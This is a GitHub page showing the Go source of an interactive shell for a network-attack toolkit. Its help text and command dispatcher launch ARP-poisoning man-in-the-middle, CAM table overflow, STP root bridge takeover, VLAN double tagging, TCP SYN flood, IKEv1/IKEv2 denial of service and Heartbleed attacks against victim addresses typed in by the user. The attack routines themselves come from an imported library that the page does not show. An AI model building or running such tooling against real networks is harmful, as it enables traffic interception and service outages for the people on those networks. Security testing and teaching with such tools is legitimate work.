-
Notifications
You must be signed in to change notification settings - Fork 0
/
scaGo.go
executable file
·204 lines (192 loc) · 7.35 KB
/
scaGo.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
package main
import (
"bufio"
"fmt"
"github.com/tiagomdiogo/ScaGo/higherlevel"
"github.com/tiagomdiogo/ScaGo/sniffer"
"log"
"os"
"strconv"
"strings"
)
// help is an aux function to output all the available instructions on
// the shell mode
func help() {
fmt.Println("Available commands:")
fmt.Println("sniff <interface name> - sniffs and shows packets to the desired interface")
fmt.Println(":")
fmt.Println("Available attacks:")
fmt.Println("")
fmt.Println("There are several developed attacks that you can perform by type the correct commands. The following attacks are available: ")
fmt.Println("Arp Cache Poisoning - This attack consists of poisoning the victim's ARP table to be able to intercept any communication (MitM)")
fmt.Println("To perform this attack type: arpcache <interface> <Victim1 IP> <Victim2 IP>")
fmt.Println("")
fmt.Println("CAM table overflow - Consists of overflowing the capacity of Cam table of a switch")
fmt.Println("To perform this attack type: camoverflow <Interface> <Number of packets to be sent>")
fmt.Println("")
fmt.Println("Root Bridge takeover - Consists of taking the role of Root bridge on a LAN network")
fmt.Println("To perform this attack type: rootbridge <Interface>")
fmt.Println("")
fmt.Println("Root Bridge takeover 2 interfaces - Consists of taking the role of Root bridge with 2 interfaces on a LAN network")
fmt.Println("To perform this attack type: rootbridge <Interface1> <Interface2>")
fmt.Println("")
fmt.Println("DHCP Spoofing - Consists of sending spoofed responses with malicious configurations")
fmt.Println("To perform this attack type: dhcpspoofing <interface>")
fmt.Println("")
fmt.Println("Double tag - inject malicious data into a network by encapsulating packets with two VLAN tags, deceiving switches and gaining unauthorized access to traffic on different VLANs.")
fmt.Println("To perform this attack type: doubletag <interface> <victimIP> <VlanOut> <vlanIn>")
fmt.Println("")
fmt.Println("TCP SYN - Consume server resources by sending SYN requests to make the system unresponsive to legitimate traffic.")
fmt.Println("tcpsyn <Target IP> <TargetPort>")
fmt.Println("")
fmt.Println("IKEv1 DoS - Consists of performing a Denial of Service attack to IKEv1 tunnel through spoofed messages")
fmt.Println("To perform this attack type: ikev1dos <flag> <number_of_packets> <destination_ip> <interface>")
fmt.Println("Available flags: -c concurrent packets | -s sequential packets")
fmt.Println("")
fmt.Println("IKEv2 DoS - Consists of performing a Denial of Service attack to IKEv2 tunnel through spoofed messages")
fmt.Println("Available flags: -c concurrent packets | -s sequential packets")
fmt.Println("To perform this attack type: ikev2dos <flag> <number_of_packets> <destination_ip> <interface>")
fmt.Println("")
fmt.Println("HeartBleed - Consists of performing a HeartBleed attack inside a TLS session")
fmt.Println("To perform this attack type: heartbleed <victimIP:port> <length> <data>")
fmt.Println("")
}
// main function of the library, it launches a shell that can be used to
// start the several coded attacks.
func main() {
fmt.Println("[*] Welcome to Goppy interactive shell")
fmt.Println("[*] Too see available commands type the command: help")
reader := bufio.NewReader(os.Stdin)
for {
fmt.Print("$Goppy Shell ")
cmd, err := reader.ReadString('\n')
if err != nil {
log.Fatal(err)
return
}
cmdWords := strings.Fields(cmd)
if len(cmdWords) == 0 {
fmt.Println("Please input any instruction")
continue
}
//switch case for each of the available functions
//it launches the function if enough arguments are provided.
switch cmdWords[0] {
case "help":
help()
case "exit":
os.Exit(0)
case "arpcache":
if len(cmdWords) < 4 {
fmt.Println("To use arpcache provide the following instructions:")
fmt.Println("arpcache <interface> <Victim1 IP> <Victim2 IP>")
continue
} else {
higherlevel.ArpMitm(cmdWords[1], cmdWords[2], cmdWords[3])
}
case "camoverflow":
if len(cmdWords) < 3 {
fmt.Println("To use camoverflow provide the following instructions:")
fmt.Println("camoverflow <Interface> <Number of packets to be sent>")
continue
} else {
numberofpacket, err := strconv.Atoi(cmdWords[2])
if err != nil {
continue
}
higherlevel.Cam(cmdWords[1], numberofpacket)
}
case "dhcpspoofing":
continue
case "doubletag":
if len(cmdWords) < 5 {
fmt.Println("To use doubletag provide the following instructions:")
fmt.Println("doubletag <interface> <victimIP> <VlanOut> <vlanIn>")
continue
} else {
vlanOut, err := strconv.ParseUint(cmdWords[3], 10, 64)
vlanIn, err := strconv.ParseUint(cmdWords[4], 10, 64)
if err != nil {
continue
}
higherlevel.DoubleTagVlan(cmdWords[1], cmdWords[2], uint16(vlanOut), uint16(vlanIn))
}
case "tcpsyn":
if len(cmdWords) < 3 {
fmt.Println("To use tpcsyn provide the following instructions:")
fmt.Println("tcpsyn <Target IP> <TargetPort> ")
continue
} else {
higherlevel.TCPSYNFlood(cmdWords[1], cmdWords[2], "120", 10000)
}
case "rootbridge":
if len(cmdWords) < 2 {
fmt.Println("To use StpRootBridgeMitM provide the following instructions:")
fmt.Println("rootbridge <interface>")
continue
} else {
higherlevel.StpRootBridgeMitM(cmdWords[1])
}
case "rootbridge2int":
if len(cmdWords) < 3 {
fmt.Println("To use rootbridge2int provide the following instructions:")
fmt.Println("rootbridge2int <interface1> <interface2>")
continue
} else {
higherlevel.StpRootBridgeMitM2(cmdWords[1], cmdWords[2])
}
case "sniff":
if len(cmdWords) < 3 {
fmt.Println("To use sniff provide the following instructions:")
fmt.Println("sniff <interface1> <filter>")
} else {
go sniffer.SniffP(cmdWords[1], cmdWords[2])
}
case "ikev1dos":
if len(cmdWords) < 4 {
fmt.Println("To use ikev1dos provide the following instructions:")
fmt.Println("ikev1dos <flag> <number_of_packets> <destination_ip> <interface>")
} else if cmdWords[1] == "-s" {
npackets, err := strconv.Atoi(cmdWords[2])
if err != nil {
continue
}
go higherlevel.IKEv1DoSSequential(npackets, cmdWords[3], cmdWords[4])
} else {
npackets, err := strconv.Atoi(cmdWords[2])
if err != nil {
continue
}
go higherlevel.IKEv1DoS(npackets, cmdWords[3], cmdWords[4])
}
case "ikev2dos":
if len(cmdWords) < 5 {
fmt.Println("To use ikev2dos provide the following instructions:")
fmt.Println("ikev2dos <flag> <number_of_packets> <destination_ip> <interface>")
} else if cmdWords[1] == "-s" {
npackets, err := strconv.Atoi(cmdWords[2])
if err != nil {
continue
}
go higherlevel.IKEv2DoSSequential(npackets, cmdWords[3], cmdWords[4])
} else if cmdWords[1] == "-c" {
npackets, err := strconv.Atoi(cmdWords[2])
if err != nil {
continue
}
go higherlevel.IKEv2DoS(npackets, cmdWords[3], cmdWords[4])
} else {
fmt.Println("Please use one of the available flags: -c concurrent | -s sequential")
fmt.Println("")
}
case "heartbleed":
if len(cmdWords) < 3 {
fmt.Println("To use heartbleed provide the following instructions:")
fmt.Println("heartbleed <victimIP:port> <length> <data>")
} else {
parsedLength, _ := strconv.ParseUint(cmdWords[2], 10, 16)
higherlevel.HeartBleed(cmdWords[1], uint16(parsedLength), cmdWords[3])
}
}
}
}